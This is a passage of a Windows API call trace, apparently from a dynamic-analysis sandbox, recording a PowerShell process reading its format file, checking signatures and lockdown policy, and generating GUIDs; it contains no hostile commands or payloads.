	[0045.103] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x24000
	[0045.104] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.104] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x25000
	[0045.104] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.104] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x26000
	[0045.104] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.104] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x27000
	[0045.104] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.104] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x28000
	[0045.105] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.105] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x29000
	[0045.105] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.105] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2a000
	[0045.105] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.105] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2b000
	[0045.105] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.105] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2c000
	[0045.106] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.106] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2d000
	[0045.106] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.106] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2e000
	[0045.106] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.106] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2f000
	[0045.106] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.107] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x30000
	[0045.107] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.107] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x31000
	[0045.107] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.107] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x32000
	[0045.107] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x684, lpOverlapped=0x0) returned 1
	[0045.107] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x32684
	[0045.107] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784a8d4, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784a8d4*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0045.107] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x32684
	[0045.107] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0045.109] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
	[0045.110] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.110] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0045.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0045.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0045.110] WldpGetLockdownPolicy () returned 0x0
	[0045.110] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.110] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x5b8) returned 0x0
	[0045.110] RegQueryValueExW (in: hKey=0x5b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0045.110] RegCloseKey (hKey=0x5b8) returned 0x0
	[0045.110] CloseHandle (hObject=0x3d8) returned 1
	[0045.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0045.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x15047880480 | out: lpFileInformation=0x15047880480*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32684)) returned 1
	[0045.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0045.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0045.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32684)) returned 1
	[0045.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0045.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0045.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x32684)) returned 1
	[0045.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0045.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
	[0045.111] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0045.111] GetFileType (hFile=0x3d8) returned 0x1
	[0045.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0045.111] GetFileType (hFile=0x3d8) returned 0x1
	[0045.111] WTGetSignatureInfo () returned 0x0
	[0045.130] CertDuplicateCertificateContext (pCertContext=0x1505fba7c20) returned 0x1505fba7c20
	[0045.130] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5f0) returned 0x0
	[0045.131] RegQueryValueExW (in: hKey=0x5f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.131] RegQueryValueExW (in: hKey=0x5f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x150478810f0, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.131] RegCloseKey (hKey=0x5f0) returned 0x0
	[0045.131] CoTaskMemAlloc (cb=0x10) returned 0x1505fb06870
	[0045.131] CoTaskMemAlloc (cb=0x50) returned 0x1505f464fe0
	[0045.131] WinVerifyTrust () returned 0x0
	[0045.131] CoTaskMemFree (pv=0x1505f464fe0) 
	[0045.132] CoTaskMemFree (pv=0x1505fb06870) 
	[0045.132] CertFreeCertificateContext (pCertContext=0x1505fba7c20) returned 1
	[0045.142] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9410
	[0045.142] GetSystemDirectoryW (in: lpBuffer=0x1505f3b9410, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.143] CoTaskMemFree (pv=0x1505f3b9410) 
	[0045.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0045.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0045.144] WldpGetLockdownPolicy () returned 0x0
	[0045.144] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.144] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0045.144] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0045.144] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.145] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x71b7051a, Data2=0x83e9, Data3=0x4a84, Data4=([0]=0x8f, [1]=0x69, [2]=0x9f, [3]=0xbb, [4]=0x35, [5]=0x2c, [6]=0xec, [7]=0x81))) returned 0x0
	[0045.145] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xca7976bb, Data2=0x9a0c, Data3=0x405f, Data4=([0]=0x9d, [1]=0x91, [2]=0x60, [3]=0x49, [4]=0x79, [5]=0xe6, [6]=0xab, [7]=0xc1))) returned 0x0
	[0045.145] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x53bdb49b, Data2=0x5825, Data3=0x4740, Data4=([0]=0x83, [1]=0xbc, [2]=0x46, [3]=0xdc, [4]=0xb2, [5]=0x8f, [6]=0x59, [7]=0x69))) returned 0x0
	[0045.145] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xe15fdc04, Data2=0xe04e, Data3=0x4e9a, Data4=([0]=0x8e, [1]=0x84, [2]=0x58, [3]=0xf7, [4]=0xb7, [5]=0x98, [6]=0xfb, [7]=0xc3))) returned 0x0
	[0045.145] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x59da6a73, Data2=0x5099, Data3=0x403f, Data4=([0]=0x85, [1]=0xc9, [2]=0x63, [3]=0x8f, [4]=0x61, [5]=0x8a, [6]=0xb1, [7]=0x8e))) returned 0x0
	[0045.146] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x5aed00d9, Data2=0x3c9a, Data3=0x4696, Data4=([0]=0x82, [1]=0x7d, [2]=0x96, [3]=0x80, [4]=0x96, [5]=0x88, [6]=0xc6, [7]=0x2f))) returned 0x0
	[0045.146] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9d05b585, Data2=0x18be, Data3=0x4afb, Data4=([0]=0x81, [1]=0xd4, [2]=0x8f, [3]=0x5f, [4]=0x44, [5]=0x1c, [6]=0x43, [7]=0xa4))) returned 0x0
	[0045.146] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xbcf7a11c, Data2=0x7a67, Data3=0x4c9c, Data4=([0]=0x8a, [1]=0xe7, [2]=0xf7, [3]=0xce, [4]=0x8c, [5]=0x80, [6]=0x19, [7]=0x14))) returned 0x0
	[0045.146] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x98e53172, Data2=0x4078, Data3=0x40d1, Data4=([0]=0x9b, [1]=0xd3, [2]=0xdc, [3]=0x0, [4]=0xad, [5]=0x9b, [6]=0x8d, [7]=0x5))) returned 0x0
	[0045.146] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x137d662a, Data2=0xd7ea, Data3=0x4479, Data4=([0]=0xa9, [1]=0xb9, [2]=0x75, [3]=0x14, [4]=0x50, [5]=0x54, [6]=0xf7, [7]=0xee))) returned 0x0
	[0045.147] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8fa28db3, Data2=0xc5bd, Data3=0x428a, Data4=([0]=0x97, [1]=0x7a, [2]=0xd2, [3]=0x92, [4]=0x12, [5]=0x64, [6]=0x8f, [7]=0x40))) returned 0x0
	[0045.147] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xfbaeb8ad, Data2=0xad52, Data3=0x47fd, Data4=([0]=0x89, [1]=0x60, [2]=0xc9, [3]=0xa, [4]=0xbc, [5]=0xae, [6]=0x15, [7]=0x7f))) returned 0x0
	[0045.147] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd80b0606, Data2=0xda10, Data3=0x4ac0, Data4=([0]=0x8c, [1]=0xba, [2]=0x8b, [3]=0xd, [4]=0xdf, [5]=0x8f, [6]=0x4e, [7]=0x3f))) returned 0x0
	[0045.147] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xcfee072f, Data2=0x3d36, Data3=0x4d49, Data4=([0]=0x9d, [1]=0x7e, [2]=0xba, [3]=0x6d, [4]=0x32, [5]=0x89, [6]=0x45, [7]=0x79))) returned 0x0
	[0045.148] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x2f5e5dba, Data2=0x53ba, Data3=0x4984, Data4=([0]=0xb7, [1]=0xdb, [2]=0x33, [3]=0x8b, [4]=0x3b, [5]=0x85, [6]=0xfc, [7]=0x93))) returned 0x0
	[0045.148] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x43aac6af, Data2=0xe290, Data3=0x4f45, Data4=([0]=0xa8, [1]=0xed, [2]=0xeb, [3]=0x1f, [4]=0x8a, [5]=0x8, [6]=0xe, [7]=0xf5))) returned 0x0
	[0045.148] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xec8757e0, Data2=0x4057, Data3=0x459b, Data4=([0]=0x97, [1]=0xb0, [2]=0xa7, [3]=0x2d, [4]=0x10, [5]=0xbb, [6]=0x44, [7]=0x51))) returned 0x0
	[0045.148] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc898e303, Data2=0xfd8a, Data3=0x42a4, Data4=([0]=0xaa, [1]=0x39, [2]=0xc7, [3]=0x4a, [4]=0xd3, [5]=0x25, [6]=0x27, [7]=0xe6))) returned 0x0
	[0045.148] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc26d8493, Data2=0x1763, Data3=0x4b7f, Data4=([0]=0x91, [1]=0xb4, [2]=0xe6, [3]=0x68, [4]=0x32, [5]=0xc2, [6]=0xab, [7]=0x5c))) returned 0x0
	[0045.149] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x59e2d1fb, Data2=0xf43, Data3=0x4db8, Data4=([0]=0xaf, [1]=0x5f, [2]=0xbe, [3]=0xc5, [4]=0x62, [5]=0x2a, [6]=0x9a, [7]=0xf9))) returned 0x0
	[0045.149] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x1c818fb9, Data2=0xdda3, Data3=0x47af, Data4=([0]=0x9c, [1]=0xa0, [2]=0x83, [3]=0xf0, [4]=0x32, [5]=0xaa, [6]=0x67, [7]=0x2b))) returned 0x0
	[0045.149] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xe9b4b0a1, Data2=0xe41, Data3=0x4519, Data4=([0]=0xb8, [1]=0x8c, [2]=0x56, [3]=0xa2, [4]=0xc9, [5]=0x8, [6]=0xc1, [7]=0x1f))) returned 0x0
	[0045.149] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x74edf39c, Data2=0xa5ee, Data3=0x4f51, Data4=([0]=0x91, [1]=0xfb, [2]=0x8, [3]=0x37, [4]=0x63, [5]=0x21, [6]=0xbd, [7]=0x4d))) returned 0x0
	[0045.149] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xaed0403e, Data2=0xd1fd, Data3=0x4bd9, Data4=([0]=0x95, [1]=0xc0, [2]=0x67, [3]=0xac, [4]=0x98, [5]=0x47, [6]=0xc, [7]=0x11))) returned 0x0
	[0045.150] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x75c47bb6, Data2=0x3c87, Data3=0x4ca6, Data4=([0]=0xab, [1]=0x59, [2]=0x5e, [3]=0xaa, [4]=0xf5, [5]=0x21, [6]=0x6f, [7]=0x5c))) returned 0x0
	[0045.150] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6cb111e, Data2=0x260a, Data3=0x48ff, Data4=([0]=0x9f, [1]=0x84, [2]=0x2a, [3]=0x8, [4]=0x7e, [5]=0xa7, [6]=0x3a, [7]=0x34))) returned 0x0
